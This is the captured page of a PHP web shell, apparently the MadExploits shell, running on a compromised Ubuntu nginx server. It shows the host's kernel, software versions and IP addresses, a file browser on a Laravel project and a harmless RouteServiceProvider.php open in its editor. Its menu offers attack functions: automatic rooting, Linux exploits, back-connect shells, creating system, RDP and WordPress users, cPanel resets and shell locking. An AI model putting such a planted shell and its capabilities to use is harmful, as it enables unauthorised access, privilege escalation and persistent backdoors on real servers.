Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
app /
Modules /
User /
Providers /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitkeep
0
B
-rw-rw-r--
RouteServiceProvider.php
1.18
KB
-rw-rw-r--
UserServiceProvider.php
2.08
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RouteServiceProvider.php
<?php namespace App\Modules\User\Providers; use Illuminate\Support\Facades\Route; use App\Providers\RouteServiceProvider as ServiceProvider; class RouteServiceProvider extends ServiceProvider { /** * The module namespace to assume when generating URLs to actions. * * @var string */ protected $moduleNamespace = 'App\Modules\User\Http\Controllers'; /** * Called before routes are registered. * * Register any model bindings or pattern based filters. * * @return void */ public function boot() { parent::boot(); } /** * Define the routes for the application. * * @return void */ public function map() { $this->mapApiRoutes(); } /** * Define the "api" routes for the application. * * These routes are typically stateless. * * @return void */ protected function mapApiRoutes() { Route::group([ 'prefix' => 'api', 'middleware' => 'cors', 'namespace' => $this->moduleNamespace, ], function ($router) { require module_path('User', 'Routes/api.php'); }); } }
Close